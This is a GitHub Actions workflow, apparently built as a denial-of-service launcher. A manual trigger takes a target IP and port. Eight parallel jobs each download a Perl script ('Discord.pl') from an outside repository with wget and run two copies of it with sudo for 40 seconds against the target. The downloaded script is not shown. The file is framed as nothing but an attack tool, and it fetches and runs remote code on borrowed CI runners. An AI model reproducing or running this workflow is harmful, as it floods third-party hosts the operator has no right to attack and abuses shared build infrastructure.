name: Discord !

on:
  workflow_dispatch:
    inputs:
      target:
        description: "IP !"
        required: true
        default: "127.0.0.1"
      port:
        description: "Port !"
        required: true
        default: "53"
      
jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 35
      matrix:
        instance: [1,2,3,4,5,6,7,8]

    steps:
      - name: Checkout (optional)
        uses: actions/checkout@v4

      - name: OK !
        run: |
          TARGET="${{ inputs.target }}"
          PORT="${{ inputs.port }}"
          
          wget https://github.com/AhmetKesser/Deneme/raw/refs/heads/main/Discord.pl -O Discord.pl
          chmod +x Discord.pl || true
          
          PIDS=()
          for i in {1..2}; do
            sudo timeout 40 perl Discord.pl "$TARGET" "$PORT" &
            PIDS+=($!)
          done

          for pid in "${PIDS[@]}"; do
            wait $pid
          done
          
      - name: Finish !
        run: |
          sleep 40
          exit 0
